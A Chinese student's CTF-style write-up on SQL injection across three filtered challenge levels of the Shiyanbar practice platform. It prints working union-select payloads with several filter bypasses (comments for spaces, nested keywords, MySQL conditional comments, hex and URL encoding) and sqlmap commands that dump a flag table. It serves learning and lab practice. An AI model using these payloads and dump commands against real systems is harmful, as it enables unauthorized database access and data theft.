sql注入探索与实践（免考题）

一、综述

sql注入攻击实质上是利用程序设计中的漏洞实现的

如果代码在引用sql语句之前，没有对传参内容进行控制，就容易被攻击者利用

本课题基于“实验吧”提供的注入实验平台，对sql注入进行全面且深入的探索性研究

由简单到复杂，在三种过滤条件下分析sql注入方法

二、一般流程

我将实战sql注入的一般流程简述如下

1 关键字

首先枚举输入关键字，探索代码过滤的具体内容，即明确哪些内容可作为参数传入sql语句

关键字包括但不限于数字、字母、特殊符号、sql运算符

2 sql语句

然后构造参数使得代码引用sql语句时出现错误，通过错误信息对sql语句的具体内容进行判断

即明确代码具体引用了哪条或哪些sql语句

3 表单结构

实战中，为了全面深入地发掘信息，我们可能需要利用代码调用的sql语句探索表单结构甚至是数据库结构

4 辅助工具

必要时，使用辅助工具（编码、爆库 etc.）

三、情境一

界面如下所示

首先尝试输入最简单的注入代码 'or 1='1

很幸运，数据库直接就吐出了表单内容，可以看到其中有ID和name两个字段

猜测代码只是简单地调用了select语句，且没有对输入内容过滤

输入sql语句进行测试，发现部分语句被过滤

可以判断代码具有过滤机制，但并不完善，我们可以构造输入内容绕过

不幸的是，当前表单中并没有我们想要的内容（flag），我们需要对数据库结构和其他表单的内容进行探索

好在通过上述测试，我们已经发现了代码漏洞

只要构造出合适的输入内容，我们就可以随意地调用sql语句，查询其他表单中的内容

进一步实验发现代码对sql语句的过滤与空格有关

以上结果显示，代码过滤了and及and后的空格

同时，也有些sql语句不会被代码处理，比如之前实验中的or怎么都不会被代码过滤

保险起见，我在构造中用注释替换全部空格

通过select database()来确定当前的数据库名

1' union/**/select/**/database()'

数据库名为web1

此外，也可以用tab来绕过，但是%a0啥的不行

information_schema 是 MySQL 自带的信息数据库，用于存储数据库元数据(关于数据的数据)

数据库名、表名、列的数据类型、访问权限等都存储在 information_schema 之中

尝试通过information_schema获取web1中的表单信息

1' union/**/select/**/table_name from/**/information_schema.tables/**/where/**/table_schema/**/='web1

然而报错了

实验发现，代码对table_schema这个字段进行了过滤，但是information_schema是可以正常输入的

干脆就直接枚举全部的表单

1' union/**/select/**/table_name from/**/information_schema.tables/**/where/**/'1'='1

找到了一个名为flag的表单

获取form flag中的全部内容

1' union/**/select/**/*/**/from/**/flag/**/where/**/'1'='1

提示字段数量不一致，没法在使用union连接的情况下直接输出

没办法，只好先查看flag中有哪些字段

1' union/**/select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_name='flag

information_schema.columns离奇消失，看来是被过滤了

大胆猜测字段名也是flag

1' union/**/select/**/flag/**/from/**/flag/**/where/**/'1'='1

嗯这应该是我们要找的东西

ps：后来发现可以它不是通过判断某个单词，而是通过判断整个关键字来过滤

通过关键字里面套关键字的方法可以完成字段查看（删去套进去的内容后，留下的组合起来正常使用）

1' union/**/select/**/colucolumn_namemn_name/**/from/**/information_schema.coinformation_schema.columnslumns/**/where/**/table_name='flag

四、情境二

emmm，一样的界面

尝试最一般的 'or 1='1

好吧，开始测试被识别出的内容具体是啥

首先数字是没有问题的

数字加字母也没有问题

简单测试sql语句和特殊符号

看来是直接过滤了空格字符

查询数据库名

1'/**/union/**/select/**/database()'

失败

进一步发现是对部分sql语句进行了过滤

出现相应语句后直接禁止访问，并不是删除后再提交，所以较难定位被检测的语句，也较难构造输入内容

继续尝试，输入1'的时候提示sql语句出错

综合报错信息和地址栏内容变化，猜测代码实现原理是定位输入框，获取其中内容作为sql查询时使用的参数

网站源码验证了这一猜想

受到URL启发，尝试把字母（select）转换成16进制表示，直接在地址栏中输入

尝试加入空字符（%00）

可以通过加入空字符绕过过滤

修改一下代码

1'/**/union/**/select/**/flag/**/from/**/flag/**/where/**/'1'='1

使用%2B表示空格，在可能被过滤的单词间加入%00

1'/**/uni%00on/**/sel%00ect/**/flag/**/from/**/flag/**/w%00here/**/'1'='1

直接在URL中输入，提示错误，看来加%00不能从根本上解决问题

尝试两次ULR编码加字母大写，也无法绕过

尝试sql语句条件注释，利用其选择执行的性质把关键字输入进去，得到了flag

1'/*!union*//*!select*/flag/*!from*/flag/*!where*/'1'='1

注意到这里的select仍然是原始状态传过去的，但没被过滤

看来可以利用php没法解释sql注释的bug绕过，直接用注释替代全部空格，就能注入成功了

（晕，折腾半天后才发现最开始的输入就能注入成功）

1'/**/union/**/select/**/flag/**/from/**/flag/**/where/**/'1'='1

五 情境三

还是这个界面

直接尝试用注释和条件注释绕过（失败）

1'/**/union/**/select/**/flag/**/from/**/flag/**/where/**/'1'='1

1'/*!union*//*!select*/flag/*!from*/flag/*!where*/'1'='1

条件注释加16进制编码

1'/*!u%6eion*//*!sel%65ct*/flag/*!%66rom*/flag/*!wh%65re*/'1'='1

测试关键字，发现居然是数字1被过滤了

把数字1换成字母a，用URL编码一次，再次尝试（还是 hello）

a%27%2F*%21u%6eion*%2F%2F*%21sel%65ct*%2Fflag%2F*%21%66rom*%2Fflag%2F*%21wh%65re*%2F%27a%27%3D%27a

了解到在1被过滤的情况下，可以借助sqlmap工具进行注入

具体使用方法参考了别人的writeup，攻击过程mark如下

得到数据库

sqlmap -u "http://ctf5.shiyanbar.com/web/index_3.php?id=1" --dbs

判断数据库正确性

sqlmap -u "http://ctf5.shiyanbar.com/web/index_3.php?id=1" --current-db

获得表名

sqlmap -u "http://ctf5.shiyanbar.com/web/index_3.php?id=1" --tables　　

获得flag表中字段

sqlmap -u "http://ctf5.shiyanbar.com/web/index_3.php?id=1" --columns -T "flag"

dump具体内容

sqlmap -u "http://ctf5.shiyanbar.com/web/index_3.php?id=1" --dump -C "flag" -T "flag"　　

实质是一个暴力脚本，所以跑起来比较慢

跑完后得到结果

六 总结

通过实践对sql注入有了深入的了解

除了提及的空格绕过、URL编码，16进制编码，sqlmap等方法，还有布尔盲注等其他技巧可用于攻击

只有深刻理解原理，熟练掌握技巧，才能在实战中游刃有余

纯手工sql注入任重道远